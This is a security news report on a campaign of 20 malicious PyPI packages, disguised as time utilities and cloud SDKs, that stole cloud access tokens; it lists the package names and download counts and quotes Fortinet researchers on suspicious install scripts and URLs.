Cybersecurity researchers have raised a red flag about a deceptive campaign aimed at Python Package Index (PyPI) users. The campaign involves counterfeit libraries posing as “time” utilities but actually designed to pilfer sensitive information such as cloud access tokens.
According to security company ReversingLabs, it has unearthed two groups of packages comprising a total of 20, with a combined download count exceeding 14,100:
- snapshot-photo (2,448 downloads)
- time-check-server (316 downloads)
- time-check-server-get (178 downloads)
- time-server-analysis (144 downloads)
- time-server-analyzer (74 downloads)
- time-server-test (155 downloads)
- time-service-checker (151 downloads)
- aclient-sdk (120 downloads)
- acloud-client (5,496 downloads)
- acloud-clients (198 downloads)
- acloud-client-uses (294 downloads)
- alicloud-client (622 downloads)
- alicloud-client-sdk (206 downloads)
- amzclients-sdk (100 downloads)
- awscloud-clients-core (206 downloads)
- credential-python-sdk (1,155 downloads)
- enumer-iam (1,254 downloads)
- tclients-sdk (173 downloads)
- tcloud-python-sdks (98 downloads)
- tcloud-python-test (793 downloads)
The first set of packages is involved in uploading data to the threat actor’s infrastructure, while the second set focuses on implementing cloud client functionalities for services like Alibaba Cloud, Amazon Web Services, and Tencent Cloud.
It has come to light that the threat actors have been exploiting “time” packages to siphon off cloud secrets. All the identified malicious packages have been removed from PyPI at present.
Further investigation has shown that three of these packages—acloud-client, enumer-iam, and tcloud-python-test—have been listed as dependencies in a popular GitHub project called accesskey_tools, which has been forked 42 times and starred 519 times.
A commit related to tcloud-python-test was made on November 8, 2023, indicating the package’s availability on PyPI since that date. The package has been downloaded 793 times as per pepy.tech statistics.
These revelations coincide with Fortinet FortiGuard Labs’ findings of numerous packages on PyPI and npm that contain suspicious install scripts meant to execute malicious code during installation or communicate with external servers.
“Suspicious URLs play a critical role in identifying potentially malicious packages as they are often used for downloading additional payloads or establishing communication with command-and-control servers, granting attackers control over compromised systems,” noted Jenna Wang.
“In 974 packages, such URLs pose a risk of data exfiltration, additional malware downloads, and other malicious activities. It is imperative to closely examine and monitor external URLs in package dependencies to thwart exploitation.”
